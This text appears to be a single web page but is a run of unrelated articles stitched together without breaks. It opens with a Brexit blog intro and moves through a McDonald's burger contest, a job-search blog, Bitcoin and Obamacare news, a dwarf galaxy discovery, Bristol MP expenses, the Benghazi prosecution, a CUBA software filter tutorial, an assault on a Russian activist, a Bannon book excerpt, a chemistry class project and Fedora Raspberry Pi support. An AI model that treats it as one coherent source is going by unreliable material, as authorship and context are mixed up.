Welcome to CRYSTAL HORIZONS. The blog after the blog before. The "shares" have disappeared, but the posts haven't. If you think that 2018 was eventful, you ain't seen nothing yet. This blog was originally about the EU and Brexit. Understandable because I'm half a British expat living in continental Europe (my other half is French). In my intro page I did mention that this blog is like cheese and will mature, and so it has... It has now acquired a new name - CRYSTAL HORIZONS. So many things are happening in the world that it's obvious that not everything revolves around Brexit. My opinions haven't changed though, and I still think that smashing the EU door is certainly not the political answer to the UK's philosophical dream. As for the blog, it still revolves around philosophy, politics and has a tinge of satire. Can philosophers and other learned individuals help me understand what the hell is going on?
McDonald's wants us to design a Texas burger
Dominant world force McDonald's is holding a contest to see who can design a signature burger for the state of Texas. But wait a minute, don't we have Whataburger in Texas already?
Dominant world force McDonald's is holding a contest to see who can design a signature burger for the state of Texas. But wait a minute, don't we have Whataburger in Texas already? Image 1 of / 12 Caption Close McDonald's wants us to design a Texas burger 1 / 12 Back to Gallery
Dominant world force McDonald's is holding a contest to see who can design a signature burger for the state of Texas.
The chain has set up a website for hopeful burger architects to submit their ideas for a Texas burger that McDonald's might add to its menu.
The campaign is a part of the chain's recently launched "Create Your Taste" campaign.
They even have a mildly sacrilegious "Come and Make It" flag on the official contest site.
The winner receives $5,000 (that's all?) and the comfort in knowing they have added to the iconic chain's Texas offerings.
RELATED: Thanks to Reddit, McDonald's secret menu is not so secret anymore
The website lets fans build a burger with choices of beef patties, bun and other staple ingredients.
We submitted one that basically recreates the Whataburger Patty Melt. Maybe it can sneak onto the menu.
In the past, McDonald's has seemingly attempted a Texas-style burger with efforts like the Homestyle Burger, the Big N' Tasty, various Angus burgers, the Triple Double Burger, the Jalapeno Double, the BBQ Ranch Burger and the Bacon McDouble.
Our arteries just shed a buttery tear.
Some Texans are probably wondering why McDonald's is trying to make a Texas burger when everyone knows we have Whataburger to handle that.
Meanwhile, McDonald's sees what we are trying to do, it appears. They don't cotton to the concept of a McWhataburger.
Chance favors only the prepared (and clear) mind
Last week, there was a terrific post here by Christine on the value of looking deep inside yourself to find what you truly love to do. This caught the notice of David Kroll, fellow blogger on Terra Sigillata here at CENtral Science.
There's a connection here that's relevant to me, and how I was able to keep my brain engaged while seeking my next position which I landed a few weeks ago.
Please bear with me as I explain, as I think there's a shred of relevance here for anyone who's currently unemployed.
My unemployment began in early January of this year. During my job search, I knew I needed to stay active mentally and physically, be focused, and expand my network.
Part of my strategy regarding networking was to use social media, including Twitter. I had an account for over a year, but tweeted seldom, with brilliant witticisms such as “Got new tires for my car today.” It's a wonder my relatives followed me, let alone anyone else.
I got into it more seriously this time around, looking to establish a consistent personal brand, as advised by the social media mavens and jargonistas. I started following science-y folks, including science bloggers, like David Kroll.
Then, on February 3rd, I saw this:
I answered each bit internally:
Hey you! Who, me?
Job-seeking in non-traditional chemistry careers? Why, yes, it so happens that I am, if you must pry.
Wanna blog with some killer writers? I'm not sure. Sounds dangerous. What or whom did they kill? Oh, wait, I get it. My answer is, um…..yes?
Contact @rachelpep http://bit.ly/eeRKOv <click>
I checked out the link. I became better acquainted with this blog and the rest of CENtral Science. (Confession: I had visited the blogs here before. Once. I hereby throw myself upon the mercy of the court.)
I really enjoyed reading the past posts by Leigh Krietsch Boerner. There was a lot of useful info that really hit home—and funny at the same time.
This sounds challenging and fun, I thought. What the heck, give it a shot! So I did, and, well, here I am.
I could have dismissed this opportunity out of hand. But in it I saw a chance to get out of my comfort zone and keep my brain active. And, hey, you never know where things will lead.
Okay, this blogging opportunity didn't directly lead to me securing my current position. But I have no doubt it made a difference. It definitely helped me keep a positive frame of mind. I was getting feedback, getting to meet new people, talk science—all good stuff.
So, when I scored a couple of interviews for chemistry positions, I was ready. I was psyched, not scared. I was able to interview without appearing desperate or downtrodden.
Okay, now for the broader relevance part.
The one facet of my job search strategy that I intentionally omitted above was giving myself a break when necessary.
If you go at this 24/7, it's easy to get burned out. In that fatigued frame of mind, it can be difficult to recognize opportunities and stay mentally engaged. Don't forget to step away from the job search when you need to. And you will need to.
I don't think it matters all that much what you do, within reason of course, as long as it makes you feel like you're productive and making some sort of contribution, even towards your own edification.
You can do volunteer work, take a class, gain a certification—expanding the breadth of your transferable skills—to further (or change) your career. Do whatever makes you feel useful and that you're advancing in some direction—even if you're not completely sure what direction that is sometimes.
I think the key is in striving to keep an objective, open mind. If you can, avoid job search tunnel-vision. If an activity doesn't appear directly related to your job search, it still might be well worth doing.
Yes, you need to find a job, but you're only human. Breaking up your routine will help your mind stay clear. Searching for a job is a job. In any job, some time away every now and then is valuable and can improve your performance.
Many companies like to tout a focus on their employees' “work-life balance.” When you're unemployed, your work and your life can become almost inextricably intertwined. During your job search, you need to achieve some separation. If you can find something to do that gives you enjoyment, all the better.
So, if you're dealing with the stresses of being unemployed, or feeling overworked while employed—please remember to give yourself a break now and then. You deserve it, and it will likely pay off.
And one more thing: Thanks, David. Thanks, Rachel. I owe you one.
Last updated: 0.6 minutes ago RT @PoliticsReid With 2/3rds of the vote in, it's looking more likely that Chicago just sent 2 African American women to the April 2 mayor… → RT @Rob64Games If you've ever slid (or blown on) a cartridge into a game console, you have African-American engineer Jerry Lawson to thank… → Prof. Sidney Wilkerson-Hill and his group ( @SmwhLab), looking for organic chemist for postdoctoral fellowship:… https://t.co/107O6UkXnu @scburdet If only I'd known enough physics to get 16/16... → RT @Organometallica #altchemjobs are just #chemjobs https://t.co/6vnHW95VdL RT @BerkeleyLab DYK ⚗ technetium (Z=43) was discovered by Emilio Segrè from an irradiated molybdenum sample made here at Berkeley Lab? It'… → You might be hungry if you end up typing "lunch plan" instead of "launch plan." https://t.co/1p5BbYAsHf @DrRobophil Maybe if I do and raise him from the grave he can answer a few questions as he has almost no presence on the internet! →
Photo
Several prominent investment firms are joining forces to buy stakes in one of the biggest Bitcoin operations in the world.
The publicly traded New York private equity and hedge fund firm Fortress Investment Group and two other investors are buying a stake in Pantera Bitcoin Partners, a San Francisco-based hedge fund operator that buys and sells virtual currencies.
The creation of the partnership represents a significant step in the push to move Bitcoin into the financial mainstream at a time when several well-publicized claims of theft have pointed to potential weaknesses in the digital currency economy.
Pantera Capital, the parent of Pantera Bitcoin, was founded in 2003 by Dan Morehead, a veteran of the hedge fund giant Tiger Management. For most of its existence, Pantera was a macro hedge fund. But since 2011, Mr. Morehead has grown increasingly fascinated with Bitcoin, he said in an interview on Tuesday. In recent months, he said, the firm's staff of 16 has shifted its attention to work full time on investments in the virtual currency world.
“We're very excited about the promise of Bitcoin and how it can transform the way we move money,” Mr. Morehead said. “The promise and possibilities here are very broad.”
When Pantera made its first regulatory filing in December, its Bitcoin fund was worth $147 million. That is significantly larger than the Bitcoin Investment Trust, a $55 million fund run by the New York firm SecondMarket that holds virtual currencies on behalf of investors.
The big venture capital firms Benchmark and Ribbit Capital are taking stakes in Pantera Bitcoin Partners, along with Fortress. All are committing to buy and sell Bitcoin and other virtual currencies through Pantera.
Video
Michael E. Novogratz, an executive at Fortress, had previously talked about his interest in Bitcoin, but until now it has been unclear how the firm was approaching digital money as an investment. Moving forward, Fortress said that it would make all of its Bitcoin purchases through Pantera.“This partnership brings together leading companies with a range of relevant expertise, well positioned to lead and capitalize on a potentially transformative evolution,” Mr. Novogratz said.
In the years after the Bitcoin program was released by an anonymous founder known as Satoshi Nakamoto in 2009, most of the dominant players were small start-ups with few links to the traditional financial world. Part of the allure of Bitcoin was that it allowed users to move and store money outside the banking system.
Recently, however, a number of pioneers, like the Japanese exchange Mt. Gox, have run into trouble, shaking confidence in the entire Bitcoin network.
At the same time, investors and financial firms with more established credentials have been expressing their growing interest in Bitcoin. Last week, Goldman Sachs became the latest Wall Street firm to issue a research report on Bitcoin's potential to shake up different parts of the financial system.
Much of the research has been focused on Bitcoin not just as a form of digital money, but also as a new payment system, buttressed by the computers linked into the Bitcoin network. The system is run according to a prewritten set of rules, which determines how the coins are created and moved between digital wallets.
Mr. Morehead's management firm is giving up some of its ownership in Pantera Bitcoin Partners, which manages the Bitcoin fund. But all of the companies involved in Pantera Bitcoin Partners will continue to make their own investments in virtual currency start-up companies.
Earlier this week, all four firms teamed up to make a $20 million investment in Xapo, a start-up that offers to secure the information needed to unlock Bitcoins in guarded vaults so that they cannot be reached by hackers.
More than two out of five Obamacare customers are upset at the cost of their premiums and deductibles, according to a new survey that shows more evidence of growing costs for consumers under the controversial healthcare law.
The survey from the nonpartisan Kaiser Family Foundation discovered that 40 percent were dissatisfied with premium and 46 percent for their deductible. The poll also showed that Obamacare customers are largely satisfied with the care they receive.
Since 2014, the year that Obamacare's markets went online, the number of people dissatisfied grew.
For instance, the number of people dissatisfied with their premium grew from 27 percent in 2014, and is now 40 percent this year. For deductibles, dissatisfaction was 32 percent and gone up to 46 percent.
However, overall Obamacare customers are happy with their coverage. About 68 percent of marketplace customers rate either "excellent" or "good," the survey said.
The findings come as rates for Obamacare have increased as insurers readjust prices. Experts have found that insurers priced their plans too low initially and have had to raise them in order to maintain financial viability.
So far this year, some insurers have proposed rate hikes of up to 20 percent. Those hikes are only proposed and must be negotiated with that state's insurance regulator.
Administration officials have pointed to a government report that showed the average cost of marketplace coverage for a person getting tax credits went up 4 percent last year. About 85 percent of marketplace customers get tax credits, and the amount of those tax credits go up to match any increases in premiums.
Astronomers have discovered a “feeble giant”: one of the largest dwarf galaxies ever seen near the Milky Way.
Ever since astronomers discovered our universe's accelerating expansion, tension has rippled between theory and observations, especially in studies of our galaxy's neighborhood.
The standard model of cosmology, which suggests that dark energy and “cold” dark matter govern the universe's evolution, predicts many more small galaxies near the Milky Way than what we've observed so far. Dwarfs should be the building blocks of larger galaxies like our own, so the lack has puzzled astronomers — are they not there, or are we just not seeing them?
Observations have closed in on theory in recent years with the advent of large surveys such as the Sloan Digital Sky Survey and the Dark Energy Survey, where observers have begun to identify hard-to-find dwarf galaxies. Dozens of dwarfs have been spotted over the last 15 years. But theory suggests perhaps even hundreds more have yet to be discovered.
Now, the list of known dwarfs has just added one of its largest members: Crater 2. You'd think large dwarfs would be easy to find, but this one's stars are spread out and easily entangled with the stars of the Milky Way. It took a sensitive survey to pick out the small galaxy hidden behind the galaxy's stars.
A New Dwarf Galaxy
Gabriel Torrealba (University of Cambridge, UK) led a team that discovered the Crater 2 dwarf galaxy in survey data collected at the Very Large Telescope in Chile. The team used specialized software to spot over-crowding among stars, searching for dim stellar clumps. But identifying a clump isn't enough. Only Crater 2 contained red giant stars and horizontal branch stars — both old, evolved stars that mark an ancient stellar population separate from the youthful Milky Way disk.
Torrealba and colleagues estimate that Crater 2 lies 391,000 light-years from Earth. That makes it one of the most distant dwarf galaxies known. It's also one of the largest: at 6,500 light-years across, it comes in fourth among our galaxy's neighbors, after the Large and Small Magellanic Clouds, and the torn-apart Sagittarius dwarf galaxy. Moreover, it's incredibly diffuse, its stars spread out over several square degrees. So despite its size, Crater 2 is much fainter than those Milky Way companions, nearly 100 times fainter than Sagittarius and almost 10,000 times fainter than the LMC.
Dwarf Galaxy Groups
The discovery of Crater 2 may help unlock an ongoing puzzle in the Milky Way's evolution. As astronomers began to discover dwarf galaxies en masse in large sky surveys, it soon became clear that some dwarfs cluster in their orbits. Crater 2 is no exception: the team estimated that the dwarf's orbit lines up with those of the Crater globular cluster, as well as the Leo IV, Leo V and Leo II dwarf galaxies.
While not a definitive association, similar orbits suggest that these objects might form a group that fell together into our galaxy's gravitational well. Astronomers have recently found similar groups near the Large Magellanic Cloud, suggesting that our galaxy's halo might have formed through many such group captures.
As sky surveys continue to enable discoveries of dwarf galaxies such as Crater 2, the gap between theory and observations continues to narrow, clarifying our understanding of the Milky Way's evolution. The future is bright for the study of these dim galaxies, thanks to surveys such as the Large Synoptic Sky Survey (LSST) on the horizon. LSST will push to even fainter magnitudes and may finally resolve the discrepancy between theory and observation.
Reference:
G. Torrealba et al. "The feeble giant. Discovery of a large and diffuse Milky Way dwarf galaxy in the constellation of Crater." Accepted for publication in Monthly Notices of the Royal Astronomical Society.
The Bristol Cable
First class travel expenses worth £24,979 claimed by former MP and current candidate for Bristol West, Stephen Williams, during his last term as MP.
Research: Lucas Batt
Words: Lorna Stephenson
Stephen Williams, Bristol West election candidate for the Lib Dems, routinely bought first class train fares on his taxpayer-funded expenses account during his previous 2005-2015 stint as MP for the constituency.
Between 2010-2015 alone (no data is available prior to 2010), Williams racked up a huge £24,979.90 expenses bill for 153 first class rail journeys, predominantly between Bristol and London Paddington. The average cost of each claim was £163.27.
When asked for comment on his use of first class, Williams, who is seeking re-election after being ousted from the seat by Labour's Thangam Debbonaire in 2015, responded:
“They were all off peak, which is the same price as the standard open. No extra cost was involved.
“I used my train journeys to deal with constituents correspondence in private.
“I only ever used trains to get to and from Westminster. Plenty of other local MPs did the same as me, others drove their cars and claimed mileage.
“I was an MP during the expenses scandal in 2009 and was given a clean bill of health by the Telegraph, BBC, ITV and the Bristol Post, all of whom went through my records.”
Throughout the same period, no first class tickets were claimed by William's parliamentary colleague Charlotte Leslie, Bristol North West MP. Dawn Primarolo, MP for Bristol South at the time, claimed £481 for first class travel, and Kerry McCarthy for Bristol East £15.
Bristol MPs Personal Travel Expenses
2010-2015 Parliament
Looking at the Bristol MPs' total travel expenses (including fuel, taxis, airfares and parking) during the 2010-15 parliament Williams claimed over £14,000 more than the second highest claim, £18,000 claimed by Dawn Primarolo.
The watchdog for expenses spending, the Independent Parliamentary Standards Authority (IPSA), brought in rules on travel expenses following the 2009 expenses scandal, but controversially did not rule out first class travel in certain circumstances.
MPs are technically permitted to buy first class travel if the cost is no more than the most expensive standard class tickets – those for peak, open return tickets not bought in advance. A 2012 Telegraph investigation exposed that 185 MPs had traveled first class by exploiting the ‘loophole'.
The IPSA guidance also requires MPs to ‘always have regard' for ‘the most cost effective way to undertake' a particular journey, and the watchdog has since repeated calls for MPs to exercise ‘restraint' when making travel arrangements.
Comparing historical ticket price data, Williams appears to have taken off-peak first class tickets, which cost the same as a standard class ‘anytime return'. Had he taken standard off-peak return tickets it would have cost the taxpayer around a third of the price.
Get the data
Interactive data explorer
—–
This article was corrected at 17:04 on 2nd June 2017 to remove reference to Karin Smyth, who was not an MP at the time, and Dawn Primarolo's constituency was corrected from Bristol West to Bristol South.
NEW YORK/WASHINGTON (Reuters) - A suspected leader of the attack on the U.S. compound in Benghazi, Libya, captured by U.S. forces and spirited out of the country, can expect to move quickly through the initial steps of the criminal justice system within hours of arriving on American soil.
Damage at the U.S. Consulate in Benghazi is seen during a protest by an armed group said to have been protesting a film being produced in the United States in this September 11, 2012 file photo. REUTERS/Esam Al-Fetori/Files
Seized in a raid last Sunday, Libyan militant Ahmed Abu Khatallah is the suspected leader of a group implicated in the 2012 attack on a U.S. diplomatic compound and CIA base in Benghazi.
A U.S. official, speaking on condition of anonymity, said Abu Khatallah was aboard the USS New York, an amphibious transport ship traveling toward the United States at normal speed.
Along the way he can expect to be questioned by intelligence experts and criminal investigators, and then delivered for arraignment to enter a plea and face questions about bond and the possible appointment of a public defender.
“This is the way it's going to be. When the U.S. decides they're going to indict someone abroad, they're going to bring them to the criminal justice system,” not to military prisons as during the George W. Bush administration, said Karen Greenberg, the director of Fordham University's Center on National Security. “He's going to be tried quickly.”
U.S. Ambassador Christopher Stevens and three other Americans died in the Benghazi attack. Abu Khatallah is charged with killing a person on U.S. property, a firearms violation and providing material support to terrorism.
The charges were filed in July 2013 but kept under a court seal until Tuesday. He is expected to be formally indicted by a U.S. grand jury.
The U.S. Justice Department filed the charges against Abu Khatallah in U.S. District Court in Washington, D.C., a venue that prosecutors have only rarely used for criminal cases involving those suspected of terrorism.
The courthouse is three blocks from where Congress meets. The White House is 12 blocks in the opposite direction. The U.S. Attorney's Office in Washington has handled the Abu Khatallah investigation and the case will stay in the U.S. capital, a spokesman said.
Common venues for U.S. terrorism cases have been the federal courts in New York and in Alexandria, Virginia.
President Barack Obama's administration once thought about using Washington as a venue to try detainees held at the U.S. prison in Guantanamo Bay, Cuba. In the face of public and political objections to bringing terrorism suspects onto the U.S. mainland, Obama ordered that the detainees be tried before military commissions in Guantanamo.
Judge Royce Lamberth, who in 2009 was chief judge of the U.S. District Court in Washington, said at the time that the court was prepared to handle the trials. In a speech to a group of lawyers, he said domestic U.S. street gangs could be more dangerous than Guantanamo detainees.
U.S. prosecutors followed a similar pattern in October after capturing another accused militant in Libya, Abu Anas al-Liby, and taking him to New York for trial.
Also in October, a Tunisian man, Nizar Trabelsi, was extradited to the United States from Belgium on charges of planning to attack a NATO air base in 2001 on behalf of al Qaeda. His case is pending in Washington.
SWIFT JUSTICE
If officials proceed as they did in the cases of al-Liby and Trabelsi, then Abu Khatallah would be brought quickly into a federal courtroom for an initial appearance.
A judge or magistrate would assign him a lawyer if he could not afford his own. The Federal Public Defender for the District of Columbia represents Trabelsi.
In the case of al-Liby, a public defender asked to be appointed as defense lawyer before al-Liby had arrived in the United States. A federal judge in Manhattan denied the request.
As a non-U.S. national, Abu Khatallah may be advised of his right under international law to access his consulate or embassy. Libya's embassy in Washington is located in the Watergate complex of offices and apartments.
He would be taken to a jail to await further proceedings and a trial, with his conditions of confinement determined by the judge or magistrate and by the jail that holds him. His defense lawyer and prosecutors could contest those conditions, such as the level of access to mail, a telephone and visitors.
Prosecutors may ask for a protective order barring Abu Khatallah's defense lawyers from speaking publicly about information the government considers confidential. Later, defense lawyers might ask for a change of venue if they thought Abu Khatallah could not get a fair trial in Washington.
If Abu Khatallah were charged with a crime eligible for the death penalty, U.S. Attorney General Eric Holder would determine whether prosecutors want to seek it.
CUBA filters - the fast food of business software?
Last time, i wrote about the generic filter possibilities that CUBA provides out of the box. I left off with two requirements as a developer, that are necessary to be confident that the generic solution does not fall down with real world problems.
Going from fast food to a real healthy meal
After going through the filter possibilities the first time, it felt a little strange to me. This first thing i thought, was something like “ok, so WTF did i spent my time on the last few years?”. Because at first glance it seemed too good to be true. Don't need to write this simple, boring and similar filter mechanisms by yourself anymore?
all orders that are in state X
all products that are in category Y
all orders that have been placed between t 0 and t 1
and t yada yada yada
From a developer point of view this is just boring stuff. As you'll get the schema behind it, it becomes pointless. Nevertheless, to wrap this generic schema into code that is efficient in terms of SQL statements and slick from UX perspective is actually pretty hard. This is why oftentimes the developer, and most notably myself, does not go from the specific problem to a more general implementation that can then be used instead of developed.
Going back to the solution we have at hand from the last blog post. After the first attempts to do some stuff with the filtering mechanism, i wasn't aware what to make of it. At this point it feels a little like fast food.
Mostly fast to get, low price, Tasty to eat at the exact moment. But after eating it, you often have a queasy conscience. You probably have a feeling, that it might bite you in the long run.
The question basically is: Is this a healthy well tasting meal?. Meaning: Are you on the right track with this solution, or will this tool fall off after the first non-obvious filter problems?
For this to figure out i will go through the two objections from the last blog post.
1. pre-defined filter combinations on behalf of the user
Many times there is a need for the developer to pre-define filter possibilities. CUBA allows you to tackle this problem on different layers. You can think of it as different categories in terms of intervene through the user as well as the developer. Below you'll see a diagram that shows this classification.
So let's look at the different solution layers one by one, starting with pre-defined filters.
1.1 pre-defined generic filters
The first option that CUBA gives the user is, that an ad-hoc filter (like created in the last blog post), can be saved within the application. To do this, the Filter section has a little Config icon on the left, that lets the user choose between different possibilities to save an ad-hoc filter.
Configuration options for saving filters in CUBA
With Save / Save as only the filter conditions (not the given values) will be saved for the current user. Next there is a possibility to save a filter as a Search folder. In this case, the entry will be shown in the side panel of the application. It stores the conditions as well as the input values and can be shared with other users. There is more stuff like Sets, which will let you save the results insted of the filter definition.
I've just screached the surface of the different options - more information about the different possibilities can be found here.
1.2 Custom UI with generic filters
The option that i showed above are mostly the same from a UI perspective. Oftentimes the need for a pre-defined filter comes from the wish to let the user be more efficient in filter execution. If you want to give the user this productiviy improvment, a custom filter UI can be created.
When you go through the example app, especially in the administration section of the app, you'll find different platform screen, where the generic filter solution is replaced with a custom filter UI. Above you see an example of the Entity Log view.
As you probably can imagine, there is no limit in customization of the UI. You can use all available input elements as well as layout possibilities to design the perfect UI.
Alongside with the customization of the UI elements, there comes the burden to handle UI events that execute the filter on your own. This is basically the trade-off you have to make to implement this kind of UI.
1.3 programatically filtered datasources
The third option that you have, is to adjust the underlying datasource of the filter. A datasource is a concept that is responsible for the data provided to UI components. Of course you have programatic access to these datasources. But often is totally ok, to just configure these datasources through the declarative definition in the XML descriptor. An example of this definition you'll find in the product-browse view in the ordermanagement app:
<dsContext> <collectionDatasource id= "productsDs" class= "com.company.ordermanagement.entity.Product" view= "product-view" > <query> <![CDATA[select e from om$Product e]]> </query> </collectionDatasource> </dsContext>
In the query tag you have the option to change the query string that should be executed. As this is a plain old JPQL Query, there is obviously a lot of freedom. A few examples can be found in the docs.
2. support for complex filters beyond attribute values or related entities
The second objection that i brought up last time is the question about the support for filters that go beyond “simple” attribute based filterings. That might be even more important than the last topic.
So let's have a look about what CUBA is capable of in this regard. Since it's a little bit harder to categorize these advanced filter requirements, i'll go through a few examples, that should give an overview of what is possible out of the box.
Products that have created within the last week
The first example that shows the dynamism of the filter feature is the possibility to add a custom condition. We'll define this condition with a criterion that uses a JQPL macro.
Lets assume we want to filter for all products, that have created within the last week. We want to track the success of these products through the orders to do a marketing campaign if necessary.
First of all we create a new condition via the UI (Product browser > Add search condition > Create new…). The name can be something like “from last week”.
In the Where condition we'll use the JPQL macro @between to define that createdTs has to be in the time frame (now-5) and now. {E} is the current entity (in this case Product).
Gimme all the iPhone lovers
The next filter example is based on an 1:N relationship. In this case, we want all the orders, that contain at least one iPhone in it. This is a little more advanced, because the product information are stored in the LineItem entity, not in Order directly.
The object graph displayed as a wonderful train wreck goes like this:
myOrder . getLineItems (). getAt ( 0 ). getProduct (). getName ()
To get this up and running, lets go into the Orders browse view:
You'll find the orders the example app. The second one, 15/11/2015 from Misty contains a Line Item with an iPhone as the product.
Next, we create another new search condition with the following settings:
In the Join Attribute, we will join the line items relation in the query. Next, in the Where attribute, we tell CUBA that li (the current Line Item) should have a product, which has a name that is like ‘%iPhone%'.
This is basically it. When doing the search (and choose the checkbox above the search button to activate the condition), you'll get only Misty's order.
It's a bit over, is that ok?
A tiny little extension will drastically increase the value of this filter. Instead of pre-defining the search string, you can let the user decide what product names to search for. Changing the Where attribute to the following:
li . product . name like ?
As well as setting the parameter type to “String” instead of “No Parameter” will give you a input field in the filter section. Entering “iPhone” or “8810” will give the the first or the corresponding second order.
Using the parameter feature a little more, we could extend our query to search for all orders that have a product in the category that the user wants to:
All Orders that have a product of a certain category
I could go on with the examples of “advanced” filters a little more, but i'll think you get the point. I haven't covered all available possibilites, but it's up to you to find it out.
The bottom line of this second objection is, that the limit is not at the point you might think of after reading my last blog post. Instead it is broader and includes much more filter use cases.
If you think it's fast food, than at least it's a delicious one
If we really want to stick to the fast food analogy (and i want - on that one you can be sure), lets say it like Jules Winnfield in Pulp Fiction did:
Mmm, this is a tasty burger! - Jules Winnfield
It's not this McDonald's or Burger King kind of fast food. Its not just any fast food restaurant. At least the CUBA filters are a very tasty Burger from Big Kahuna Burger.
First of all, CUBA generic filters are fast (to “develop”). That's a fact. If you compare it to developing the same feature set from scratch - well, we'll see us in a year (if you have your five programming buddies around). Even if you plan to implement the concrete filter requirements you have at hand. Compare the effort to using this solution: even in this case it will be more effort.
Second, CUBA generic filters are cheap. Since software developers paychecks are the driving cost factors in most IT efforts, you should probably optimize for it. I will not start the make or buy discussion right here, but i think the price/performance ratio is pretty unique. Perhaps i'll cover this topic in a future blog post.
Last but not least, CUBA generic filters are healthier than there reputation (or the one that i painted above). I hope i could point out, that unlike our burger example here, the filter mechanism is not just for the run-of-the-mill case. Instead it can handle filter requirements that are way beyond what anyone could call “easy”.
Unknown assailants have severely beaten and hospitalized an environmental activist in Russia's southwestern city of Krasnodar after he filmed illegal construction of a luxury mansion on the Black Sea coast.
Activist Andrei Rudomakha, head of Environmental Watch of the North Caucasus in southern Russia, suffered skull fractures, a broken nose, and a moderate concussion when he was beaten by three masked men late on December 28.
A colleague posted a photo of Rudomakha after the attack:
Activist Aleksandr Savelyev, who was present at the time of the attack, said Rudomakha and other members of his nongovernmental organization had just returned from the Black Sea coast and were near a house owned by one of the group members when the attack occurred.
"Their goal was to collect the material that we filmed," Savelyev said on December 29, adding that the attackers could not have known where to wait without information provided by police or security services.
"They ran from behind, sprayed [Rudomakha] with pepper spray, then knocked him to the ground and kicked him in the face," Savelyev said.
"They took our backpacks and three cameras" along with laptops and footage of the illegal construction activity, he said.
Savelyev said the residence the group was inspecting is being built without a permit in a coastal forest area near a luxury property that has been linked to Russian President Vladimir Putin.
"They fenced off the forest," Savelyev said. "There is construction equipment, dogs, security guards. It's all very serious."
Savelyev said his group is convinced the new construction is for a senior official in the Russian government.
Krasnodar Krai regional police said they are investigating the attack.
Since 1997, Environmental Watch of the North Caucasus has exposed illegal landfills, the destruction of landscapes, and the contamination of waterways in the regions of Krasnodar Krai, Stavropol Krai, Rostov, Adygea, Karachayevo-Cherkesia, and Kabardino-Balkaria.
Some of their investigations also have exposed illegal land grabs by local Russian officials.
The group has actively campaigned against illegally built villas on the Black Sea and criticized construction in Sochi ahead of the 2014 Winter Olympics as destructive to the environment.
Activists in the group have been attacked in the past. One former member, Yevgeny Vitishko, spent nearly two years in prison on charges of damaging a fence in a forest.
In September 2016, Russia's Justice Ministry declared that the group's activities are political and added the organization to Russia's registry of foreign agents.
With reporting by AFP, AP, and Interfax
The devil is in the details — in this case, literally.
Bloomberg Businessweek senior national correspondent Joshua Green has unearthed at least one nasty detail for his new book that already has Washington buzzing. It's called Devil's Bargain: Steve Bannon, Donald Trump, and the Storming of the Presidency.
The insult surfaced in the spring of 2016. One by one, Donald Trump was knocking down his opponents and becoming the GOP nominee.
But Speaker Paul Ryan was still a dream for some Republicans, who couldn't stomach the thought of a Trump presidency. Green writes that this “sent Bannon into a panic.”
Breitbart News Chairman Steve Bannon wasn't yet working for Trump as his chief strategist. But Matthew Boyle and other Breitbart reporters there were busy writing scathing stories about Ryan under Bannon's direction. But he really didn't have to push too hard. In May, ex-Breitbart reporter Lee Stranahan told Vanity Fair that Boyle had “fetish-ized going after Paul Ryan. I don't know how else to put it, it's just complete obsession.”
Bannon's remark is at least comparable to Trump's “grab 'em by the pussy” remark.
But the bright side? At least he's not jokingly condoning sexually assaulting women.
Green wrote that Bannon called Ryan “a limp-dick motherfucker who was born in a petri dish at the Heritage Foundation.”
Heritage is a well-known conservative think tank in Washington.
I'm trying out a new PBL I developed in my chemistry 12 class, along with a colleague. The problem is as follows:
5 solutions are given to each group. The identities of the solutions are given, but they need to figure out which bottle is which chemical. In order to make sure there is a good variety of skills involved in solving the problem (i.e. can't just use a bunch of indicators for the whole thing), a couple of restrictions are put into place:
Only allowed 2 types of indicators. No universal indicator provided. Data needs to include a graphical component.
The hope is that number 2 gets students thinking about titration curves.
Assessment
The assessment is fairly straight forward:
The idea is the PBL will get students thinking about how to identify the required chemistry such as calculating out the pH of weak acids/bases, and they will ask me questions on how to do it (after they've tried for themselves).
One of the biggest issues with PBLs like these is that if every group gets the same solutions, it'll reduce the amount of thinking involved. Students tend to copy or play follow the leader without a lot of consideration as to why they're doing it. Another long term issue is if the same PBL is conducted over multiple years, students generally have an easier time doing it presumably because they've been told my past students. To address these problems, this PBL has been “modularized“. I've created a set of solutions I can mix and match to control the difficulty of the process (I would tailor this to the strength of the group) and make sure everyone in the class has variety or something unique. This would also ensure the PBL doesn't get stale over a longer period of time.
The list of solutions and some possible combinations are:
[EDIT: The combinations have been removed, but if you are interested fire me a message!]
Update
For the next iteration of this PBL, I would consider adding phosphoric acid to the list – we didn't have any so we had to adapt!
The second thing I would consider is limiting students to 1 indicator of their choice – one group was able to differentiate all the solutions using 2 indicators. I want to force them to perform titrations (and analyze graphs).
Advertisements
This article comes courtesy of Peter Robinson, member of the Fedora release engineering team. Peter has worked for several years on the general release and also hardware architectures such as ARM and Power. Here, Peter announces some big news for Raspberry Pi hackers.
So support for the Raspberry Pi in Fedora has been a long time coming and yes, it's FINALLY here with support landing just in time for Beta!
The most asked question I've had for a number of years is around support of the Raspberry Pi. It's also something I've been working towards for a very long time on my own time. The eagle-eye watchers would have noticed we almost got there with Fedora 24, but I got pipped at the post because I felt it wasn't quite good enough yet. There were too many minor issues around ease of use.
Why has it taken so long?
Basically it comes down to four things:
Decent upstream kernel/userspace hardware support without binary drivers. Firmware redistribution. The ability to be able to support it in Fedora ARM without adding vast extra workload to the small group supporting/QAing Fedora. Time — It's been a pet project, but like many things, it's relied upon getting open drivers done, and kernel support upstream. All of this has been out of our hands and takes time.
What's supported?
We support everything you'd expect from a device supported by Fedora. We have a proper Fedora supported upstream userspace and kernel, with all the standard Fedora features like SELinux support. It receives the usual array of updates so no need to exclude kernel updates! The kernel supports all the drivers you'd expect, like various USB WiFi dongles, etc. You can run whichever desktop you like (more on those below) or Docker/Kubernetes/Ceph/Gluster as a group of devices — albeit it slowly over a single shared USB bus!
Raspberry Pi 2
The hardware support here is pretty good. I've been testing a minimal install, Workstation, and XFCE. We have the usual MMC/USB/network, as well as fully accelerated graphics with an open driver, as well as a lot of the other on board hardware. You'll want to invest in a good quality Class 10 micro SD card, though, for best results.
Raspberry Pi 3
The hardware support here is very similar to that of the Raspberry Pi2 in terms of standard device support. We don't currently support the onboard WiFi/Bluetooth, so at the moment it's a faster version of the RPi2. We're working to enable the WiFi soon, now the firmware is able to be distributed. There are a few other quirks documented well in the upstream Raspberry Pi3 support summary here.
We currently only support this as a ARMv7 device like the upstream Raspberry Pi Foundation. I realize that aarch64 support is now upstream. We'll eventually support it too, but there's quite a bit of extra work to support it well. Given the Raspberry Pi3 has a limitation of 1Gb RAM, the 64 bit support provides less advantage than a single set of images to support both devices.
What's not supported (yet!)
The state of various components, such as WiFi, sound, media decode, and HAT support, is well documented in a Frequently Asked Questions (FAQ) on the Fedora Raspberry Pi wiki here, with lots of detail. It'll be updated as the status of various components change.
